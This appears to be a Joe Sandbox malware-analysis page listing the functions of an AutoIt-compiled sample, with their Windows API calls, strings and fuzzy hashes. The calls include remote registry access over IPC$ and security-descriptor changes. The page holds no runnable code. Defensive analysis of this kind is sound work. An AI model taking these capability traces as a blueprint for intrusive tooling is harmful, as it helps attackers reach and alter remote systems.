Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: e5e66be4c8a13f8c74dbe4250b3460de2fe9ed12c610320582700802b8573f97
Instruction ID: 870c3541f11e1251a7ac1b859340dacc5909f3178ce83c02cc689ad34dfafc31
Opcode Fuzzy Hash: e5e66be4c8a13f8c74dbe4250b3460de2fe9ed12c610320582700802b8573f97
Instruction Fuzzy Hash: 8C61D03A900211EFDB215F65DC8276D37A4EB10322F240125EC61BB1C5DF74CACDA6AA

Function 00C8E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00C8E754
GetFileSize.KERNEL32(00000000,00000000), ref: 00C8E76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C8E776
CloseHandle.KERNEL32(00000000), ref: 00C8E783
GlobalLock.KERNEL32(00000000), ref: 00C8E78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C8E79B
GlobalUnlock.KERNEL32(00000000), ref: 00C8E7A4
CloseHandle.KERNEL32(00000000), ref: 00C8E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C8E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CAD9BC,?), ref: 00C8E7D5
GlobalFree.KERNEL32(00000000), ref: 00C8E7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 00C8E809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00C8E834
DeleteObject.GDI32(00000000), ref: 00C8E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C8E872

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: d7ea3cad11a4bfc8d118dbe58d1e41cec3e9131dae060f737e629a85a1263609
Instruction ID: ff273eeed05b3219234ceef078bd3d3be9ed82f8e49e046f4d4b74890341a0a3
Opcode Fuzzy Hash: d7ea3cad11a4bfc8d118dbe58d1e41cec3e9131dae060f737e629a85a1263609
Instruction Fuzzy Hash: 23412875600204EFDB119F65DC88FAE7BB9EB8A719F108058F917D72A0D7309E41DB60

Function 00C705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00C7076F
_wcscat.LIBCMT ref: 00C70787
_wcscat.LIBCMT ref: 00C70799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C707AE
SetCurrentDirectoryW.KERNEL32(?), ref: 00C707C2
GetFileAttributesW.KERNEL32(?), ref: 00C707DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C707F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00C70806

Strings

*.*, xrefs: 00C70845

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: a1a90fdd5ca715f3a8ed985c7d70ec0df0e386c55abddafe3f24fa01cb183de8
Instruction ID: 3cd31447c36a3ccf03cef8cb45302e70ea08701f4c9f53f29f56f8237df7666d
Opcode Fuzzy Hash: a1a90fdd5ca715f3a8ed985c7d70ec0df0e386c55abddafe3f24fa01cb183de8
Instruction Fuzzy Hash: 0B818071504341DFCB24EF24C85596EB7E8BBC8314F28C82EF899D7251EA30EA55CB92

Function 00C8EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C8EF3B
GetFocus.USER32 ref: 00C8EF4B
GetDlgCtrlID.USER32(00000000), ref: 00C8EF56
_memset.LIBCMT ref: 00C8F081
GetMenuItemInfoW.USER32 ref: 00C8F0AC
GetMenuItemCount.USER32(00000000), ref: 00C8F0CC
GetMenuItemID.USER32(?,00000000), ref: 00C8F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00C8F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00C8F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C8F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C8F1C8

Strings

0, xrefs: 00C8F079

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 2ec8b46e0f4b92c9be85afa46326b1c1082e2d11c5a027915f109d8b5c7f49de
Instruction ID: 3275f865fdea4d34d00885bcbde02640006b79057f2a3ea6c644bb292d0c42de
Opcode Fuzzy Hash: 2ec8b46e0f4b92c9be85afa46326b1c1082e2d11c5a027915f109d8b5c7f49de
Instruction Fuzzy Hash: 3981AF71604301EFD710EF15C888A6FBBE9FB88318F04492EF9A597291D730D902CB66

Function 00C5A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C5ABD7
Part of subcall function 00C5ABBB: GetLastError.KERNEL32(?,00C5A69F,?,?,?), ref: 00C5ABE1
Part of subcall function 00C5ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C5A69F,?,?,?), ref: 00C5ABF0
Part of subcall function 00C5ABBB: HeapAlloc.KERNEL32(00000000,?,00C5A69F,?,?,?), ref: 00C5ABF7
Part of subcall function 00C5ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C5AC0E

Part of subcall function 00C5AC56: GetProcessHeap.KERNEL32(00000008,00C5A6B5,00000000,00000000,?,00C5A6B5,?), ref: 00C5AC62
Part of subcall function 00C5AC56: HeapAlloc.KERNEL32(00000000,?,00C5A6B5,?), ref: 00C5AC69
Part of subcall function 00C5AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C5A6B5,?), ref: 00C5AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C5A8CB
_memset.LIBCMT ref: 00C5A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C5A8FF
GetLengthSid.ADVAPI32(?), ref: 00C5A910
GetAce.ADVAPI32(?,00000000,?), ref: 00C5A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C5A969
GetLengthSid.ADVAPI32(?), ref: 00C5A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C5A995
HeapAlloc.KERNEL32(00000000), ref: 00C5A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C5A9BD
CopySid.ADVAPI32(00000000), ref: 00C5A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C5A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C5AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C5AA2F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d0c51a40057cc9c0b2fc03d444d9421738686b8d9ebab5e193708fdc52872c93
Instruction ID: 1322e59143ecad7fc8fcbb852f35fa983a9cd4c831eeed359a84070853bde69e
Opcode Fuzzy Hash: d0c51a40057cc9c0b2fc03d444d9421738686b8d9ebab5e193708fdc52872c93
Instruction Fuzzy Hash: C9516B75900209AFDF00CF91DC84EEEBBB9FF05305F04821AF922A7290DB319A49DB65

Function 00C79DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C79E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C79E42
CreateCompatibleDC.GDI32(?), ref: 00C79E4E
SelectObject.GDI32(00000000,?), ref: 00C79E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C79EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00C79EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C79F0F
SelectObject.GDI32(00000006,?), ref: 00C79F17
DeleteObject.GDI32(?), ref: 00C79F20
DeleteDC.GDI32(00000006), ref: 00C79F27
ReleaseDC.USER32(00000000,?), ref: 00C79F32

Strings

(, xrefs: 00C79ED7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: b00084c2c93b33a3ccbe23bd77fb465d22ef29e29b62af5a7b7b6e858fad8393
Instruction ID: 289897bd24c00989c59aaa310a7cad76b1eb6a734cdef66e262694c7bb8433d6
Opcode Fuzzy Hash: b00084c2c93b33a3ccbe23bd77fb465d22ef29e29b62af5a7b7b6e858fad8393
Instruction Fuzzy Hash: E0512875900309AFCB15CFA8C885FAEBBB9EF49710F14881DF95AA7250D731A941CB90

Function 00C6CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00C6CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00C6CCC5
__swprintf.LIBCMT ref: 00C6CD1E
__swprintf.LIBCMT ref: 00C6CD37
_wprintf.LIBCMT ref: 00C6CDED
_wprintf.LIBCMT ref: 00C6CE0B

Strings

^ ERROR, xrefs: 00C6CD8F
Line %d (File "%s"):, xrefs: 00C6CD18, 00C6CD31
"%s" (%d) : ==> %s:%s%s, xrefs: 00C6CDE8
"%s" (%d) : ==> %s:, xrefs: 00C6CE06
Error: , xrefs: 00C6CDB5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: a739cce1aed0a16de01cc3e503bbd4c74a0d4ab70f942371fad506b110600d32
Instruction ID: f5186d4a2479f6ddb7c5cd2629999659c1410a4148b1be8237de03609e740d3e
Opcode Fuzzy Hash: a739cce1aed0a16de01cc3e503bbd4c74a0d4ab70f942371fad506b110600d32
Instruction Fuzzy Hash: CF517D71900259ABCB25EBA0DDC6EEEB778AF08300F100165F515725A2EB316F69EB61

Function 00C6CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C6CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C6CAB0
__swprintf.LIBCMT ref: 00C6CB09
__swprintf.LIBCMT ref: 00C6CB22
_wprintf.LIBCMT ref: 00C6CBCD
_wprintf.LIBCMT ref: 00C6CBEB

Strings

Line %d (File "%s"):, xrefs: 00C6CB03, 00C6CB1C
"%s" (%d) : ==> %s:%s%s, xrefs: 00C6CBC8
"%s" (%d) : ==> %s:, xrefs: 00C6CBE6
^ ERROR , xrefs: 00C6CB64
Error: , xrefs: 00C6CB95

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 44bec2e8eb6b7be063db72eb8e7ab0c320d51cfcc676ac15428b049cf11989fc
Instruction ID: 490394ba3afb053a7239e65d55a4c12396939639004bd529d1194ab90fcde4ad
Opcode Fuzzy Hash: 44bec2e8eb6b7be063db72eb8e7ab0c320d51cfcc676ac15428b049cf11989fc
Instruction Fuzzy Hash: 88518F71900259BBCB25EBE0DD86EEEB778AF04300F100065B516735A2EB716F69EF61

Function 00C655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C655D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C65664
GetMenuItemCount.USER32(00CE1708), ref: 00C656ED
DeleteMenu.USER32(00CE1708,00000005,00000000,000000F5,?,?), ref: 00C6577D
DeleteMenu.USER32(00CE1708,00000004,00000000), ref: 00C65785
DeleteMenu.USER32(00CE1708,00000006,00000000), ref: 00C6578D
DeleteMenu.USER32(00CE1708,00000003,00000000), ref: 00C65795
GetMenuItemCount.USER32(00CE1708), ref: 00C6579D
SetMenuItemInfoW.USER32(00CE1708,00000004,00000000,00000030), ref: 00C657D3
GetCursorPos.USER32(?), ref: 00C657DD
SetForegroundWindow.USER32(00000000), ref: 00C657E6
TrackPopupMenuEx.USER32(00CE1708,00000000,?,00000000,00000000,00000000), ref: 00C657F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C65805

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 8386babeeedc40688c2d87d4e3bd8305878383a0a77ef08129fca98ac9742043
Instruction ID: 37e852b3bd9471514be5e52b042c18a366c112dae3e4d83dbb3d30e82689c034
Opcode Fuzzy Hash: 8386babeeedc40688c2d87d4e3bd8305878383a0a77ef08129fca98ac9742043
Instruction Fuzzy Hash: 1871E270640605BEEB309F55DCC9FAABF65FB01368F340215F6256A2E1C7B1A920DB90

Function 00C5A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C5A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C5A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C5A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C5A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C5A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C5A2AB

Strings

SOFTWARE\Classes\, xrefs: 00C5A17D
\IPC$, xrefs: 00C5A1F3
\CLSID, xrefs: 00C5A193

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: e1be2af124e61df7cf970166e37318596cbb8fa306dd6d71455d81dc8ddb5b0d
Instruction ID: f1fe8666f49df3e092fbafabfa8b393ccc7bc0c76d48f6638129ee13a793b1c8
Opcode Fuzzy Hash: e1be2af124e61df7cf970166e37318596cbb8fa306dd6d71455d81dc8ddb5b0d
Instruction Fuzzy Hash: 27410976C10229ABDF11EBA4EC85EEEB778FF14700F004129F916A35A0EB709E45DB50

Function 00C83C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C82BB5,?,?), ref: 00C83C1D

Strings

HKEY_CURRENT_USER, xrefs: 00C83CE2
HKEY_USERS, xrefs: 00C83D04
HKCC, xrefs: 00C83CD1
HKEY_LOCAL_MACHINE, xrefs: 00C83C6C
HKCU, xrefs: 00C83CF3
HKCR, xrefs: 00C83CAB
HKU, xrefs: 00C83D15
HKEY_CLASSES_ROOT, xrefs: 00C83C96
HKEY_CURRENT_CONFIG, xrefs: 00C83CC0
HKLM, xrefs: 00C83C81

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: b7675db955b3761f7d26cc28df587fad1e6544e3d73e1615901f62d35421f09c
Instruction ID: b67e6b5fdda5eb0ba97096d97fdf3a2b35f9006780bfcca444aae82696e21690
Opcode Fuzzy Hash: b7675db955b3761f7d26cc28df587fad1e6544e3d73e1615901f62d35421f09c
Instruction Fuzzy Hash: 3F4165701202898BCF04FF10E851AEF3365AF12744F106856FD652B292FB70EE0ADB64

Function 00C625B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C936F4,00000010,?,Bad directive syntax error,00CBDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C625D6
LoadStringW.USER32(00000000,?,00C936F4,00000010), ref: 00C625DD
_wprintf.LIBCMT ref: 00C62610
__swprintf.LIBCMT ref: 00C62632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C626A1

Strings

Error: , xrefs: 00C6266F
Line %d (File "%s"):, xrefs: 00C62647
%s (%d) : ==> %s.: %s %s, xrefs: 00C6260B
., xrefs: 00C62687
Line %d:, xrefs: 00C6262C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: a13c43cac26625467b9228bec5bf3e9f525ee966a69e5a420f6e124bc726e5cd
Instruction ID: c7cbb776dc7e87768d36fc21f172d26a683e629cb9a590353737f886c3b76e49
Opcode Fuzzy Hash: a13c43cac26625467b9228bec5bf3e9f525ee966a69e5a420f6e124bc726e5cd
Instruction Fuzzy Hash: 9B219131C0022ABFCF11BF90DC4AFEE7B38BF18304F040466F516660A2EA71A624EB51

Function 00C67AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C67B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C67B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C67B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C67B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C67B8C

Strings

status PlayMe mode, xrefs: 00C67B3D
play PlayMe, xrefs: 00C67B87
open , xrefs: 00C67AF1
alias PlayMe, xrefs: 00C67B1B
close PlayMe, xrefs: 00C67B53, 00C67B80
play PlayMe wait, xrefs: 00C67B76

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 3db8a620524b7c7147147f1fdbe3a9ddacf0fd1789760c12d837ba2aaaafc53d
Instruction ID: 1f3ef77ab86a637f1f7cebd975a24dc786bf15d3bae73c86ce0202710358590a
Opcode Fuzzy Hash: 3db8a620524b7c7147147f1fdbe3a9ddacf0fd1789760c12d837ba2aaaafc53d
Instruction Fuzzy Hash: BF11C4B06402A97AD720B761DC8ADFF7BBCEBD1B04F00092A7521A31D1DA700A44C5B1

Function 00C6778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C67794

Part of subcall function 00C3DC38: timeGetTime.WINMM(?,75C0B400,00C958AB), ref: 00C3DC3C

Sleep.KERNEL32(0000000A), ref: 00C677C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00C677E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00C67806
SetActiveWindow.USER32 ref: 00C67825
